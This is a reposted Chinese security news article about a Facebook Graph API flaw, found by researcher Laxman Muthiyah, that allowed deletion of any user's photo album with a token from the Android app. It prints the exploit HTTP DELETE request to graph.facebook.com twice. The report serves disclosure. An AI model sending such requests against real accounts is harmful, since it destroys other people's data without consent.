转载

Facebook用户相册任意删除漏洞

印度安全研究人员Laxman Muthiyah 在Facebook  Graph API上发现一个安全漏洞,攻击者可以利用该漏洞删除任意用户Facebook相册。

FreeBuf科普:什么是Graph API?

Facebook Graph API可以理解为一个可以访问Facebook数据的Web服务。该API提供了对人员,相册,事件等等Facebook对象以及这些对象之间诸如朋友,标签,分享内容等等连接之间的访问。

当输入一个URL后,会返回一个Json对象 。Graph API是开发人员读写用户数据的主要方式。目前所有的Facebook应用程序使用的都是Graph API。

漏洞描述

理论上来说facebook  Graph API需要访问令牌(access token)才能访问或者修改数据,但是研究人员却可利用移动版Facebook生成的访问令牌删除其他Facebook用户相册。

Facebook用户相册任意删除漏洞

对于攻击者来说删除受害者Facebook账户下的相册非常简单,只需要发送一个基于HTTP的Graph API请求即可完成任意删除操作。

请求: - DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Facebook_for_Android_Access_Token> 响应:-true Album(518171421550249) got deleted :D so whatsthe next step? Took victim's album id and tried to delete it. I was verycurious to see the result.  请求: - DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Facebook_for_Android_Access_Token> 结果:-true OMG :D the album got deleted! So i got the key to delete all of your Facebookphotos :P lol :D "

POC视频

视频上传中

[参考来源 securityaffairs ,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

正文到此结束
Loading...